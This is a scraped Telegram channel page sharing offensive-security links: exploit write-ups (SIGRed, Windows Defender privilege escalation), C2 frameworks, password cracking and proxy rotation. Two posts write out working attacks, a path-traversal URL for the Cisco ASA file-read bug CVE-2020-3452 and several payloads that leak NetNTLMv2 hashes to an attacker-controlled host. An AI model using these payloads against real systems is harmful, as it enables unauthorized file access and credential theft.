hackspace
@hackspace
165 subscribers
283 photos
82 videos
25 files
1.02K links
hackspace
Download Telegram
About
Blog
Apps
Platform
Join
hackspace
165 subscribers
hackspace
https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/
Check Point Research
SIGRed - Resolving Your Way into Domain Admin: Exploiting a 17 Year-old Bug in Windows DNS Servers - Check Point Research
Research by: Sagi Tzadik Introduction DNS, which is often described as the “phonebook of the internet”, is a network protocol for translating human-friendly computer hostnames into IP addresses. Because it is such a core component of the internet, there are…
56 views
hackspace
https://itm4n.github.io/cve-2020-1170-windows-defender-eop/
itm4n’s blog
CVE-2020-1170 - Microsoft Windows Defender Elevation of Privilege Vulnerability
Here is my writeup about CVE-2020-1170, an elevation of privilege bug in Windows Defender. Finding a vulnerability in a security-oriented product is quite satisfying. Though, there was nothing groundbreaking. It’s quite the opposite actually and I’m surprised…
57 views
hackspace
GitHub - Q4n/CVE-2020-1362: writeup of CVE-2020-1362
https://github.com/Q4n/CVE-2020-1362
44 views
hackspace
45 views
hackspace
Releases · BC-SECURITY/Starkiller · GitHub
https://github.com/BC-SECURITY/Starkiller/releases
GitHub
Releases · BC-SECURITY/Starkiller
Starkiller is a Frontend for PowerShell Empire. Contribute to BC-SECURITY/Starkiller development by creating an account on GitHub.
52 views
hackspace
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.
https://github.com/hlldz/dazzleUP
GitHub
GitHub - hlldz/dazzleUP: A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates…
A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems. - hlldz/dazzleUP
57 views
hackspace
Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

For example to read "/+CSCOE+/portal_inc.lua" file.

https://<domain>/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

Happy Hacking!
89 views
hackspace
53 views
hackspace
https://medium.com/@ScatteredSecrets/bcrypt-password-cracking-extremely-slow-not-if-you-are-using-hundreds-of-fpgas-7ae42e3272f6?s=09
Medium
Bcrypt password cracking extremely slow? Not if you are using hundreds of FPGAs!
Building custom FPGA-based hardware to crack bcrypt passwords.
138 views
hackspace
52 views
hackspace
NATO releases Malware Analysis primer


https://ccdcoe.org/library/publications/malware-reverse-engineering-handbook/
49 views
hackspace
Malware_Reverse_Engineering_Handbook.pdf
4.8 MB
Malware_Reverse_Engineering_Handbook.pdf
127 views
hackspace
https://soundcloud.com/queed-inc
SoundCloud
yung innanet
hey kid are you a computer wizard

$xmr = 88JcszMHeaWXn1kc5AqC6xYwaJVrbpy4xRwaCDc1D2W1XvJLNTPVwVxbDch71sVF7JcSKCMDwy8TzHFM9Rn7AXkfQELTf1j

$btc = bc1qk90fg480v0mzvw7m7splyvl8w6zmuu9yy5l3d9
51 views
hackspace
Flipper Zero — Tamagochi for Hackers by Flipper Devices Inc. — Kickstarter
https://www.kickstarter.com/projects/flipper-devices/flipper-zero-tamagochi-for-hackers
Kickstarter
Flipper Zero — Multitool for Hackers
Open source multi-tool device for researching and pentesting radio protocols, access control systems, hardware, and more.
82 views
hackspace
52 views
hackspace
“Exploiting File Upload using Null byte” by Gupta Bless https://link.medium.com/VfjDpqmfD8
Medium
Exploiting File Upload using Null byte
In my previous blog related to FILE upload, I already discussed some basic techniques to bypass whitelisting of file extensions. Now in…
48 views
hackspace
You can steal NetNTLMv2 by changing SMB port:
net use \\IP@80\t
or pdf : /F (\\\\IP@80\\t)
or subdoc : ///IP@80/t
or doc: Target="file://IP@80/t.dotx"
or lnk: URL=file://IP@80/t.htm
50 views
hackspace
https://shells.systems/octopus-v1-0-stable-cobalt-strike-deployment-much-more/
Shells.Systems
Octopus v1.0 stable: Cobalt Strike deployment & much more! - Shells.Systems
Estimated Reading Time: 4 minutes After months of releasing the first version of Octopus, I’m more than glad to announce that the stable version of Octopus is out! During the past few months, I worked with talented people to enhance Octopus capabilities and…
55 views
hackspace
bashtop - Awesome Linux resource monitor - nixCraft
https://www.cyberciti.biz/open-source/command-line-hacks/bashtop-awesome-linux-resource-monitor-tool/
nixCraft
bashtop – Awesome Linux resource monitor that shows usage and stats for processor, memory, disks, and network
bashtop is an awesome resource monitor that shows usage and stats for processor, memory, disks, and network for Linux, macOS & FreeBSD/Unix.
56 views
hackspace
https://medium.com/@devinjaystokes/using-proxycannon-ng-to-create-unlimited-rotating-proxies-fccffa70a728?s=09
Medium
How to Create Unlimited Rotating IP Addresses with AWS
We can increase our capabilities to distribute our HTTP requests over a larger and larger pool of networks.
54 views